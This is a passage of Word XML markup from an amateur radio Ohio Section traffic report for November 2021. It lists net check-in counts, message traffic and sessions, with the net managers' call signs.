                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>387</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1070" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="113DE147" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>73</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1140" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0DF81FD0" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>374</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1311" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="02E918D3" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1457" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="436A1B36" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> WG8Z</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="23FFEBDF" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="77E643DB" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> TCTTN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="990" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="57C61CC5" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>141</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1070" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="664AA747" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1140" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="59003658" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>321</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1311" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7831A8DB" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1457" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2427C010" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> WB8YYS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C089D7C" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="618E5EDC" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DD9FC55" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>OHIO SECTION TRAFFIC REPORT – NOVEMBER 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB21DA0" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32274750" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">OHIO SECTION NETS </w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>NOVEMBER 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E786C7" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="782A5B67" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>NET</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>QNI</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>QTC</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>QTR</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>SESSIONS</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>N/M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0179D4" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>BN(E)</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>99</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>204</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>28</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>N2LC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAB73C9" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>BN(L)</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> 53  </w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>35</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>151</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>WB8LBI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F85C195" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>OSN</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> 90</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>464</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> 21</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>N2LC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2960499F" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>OSSBN</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>1578</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>288</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>1655</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> 90</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>KC8WH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF52017" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
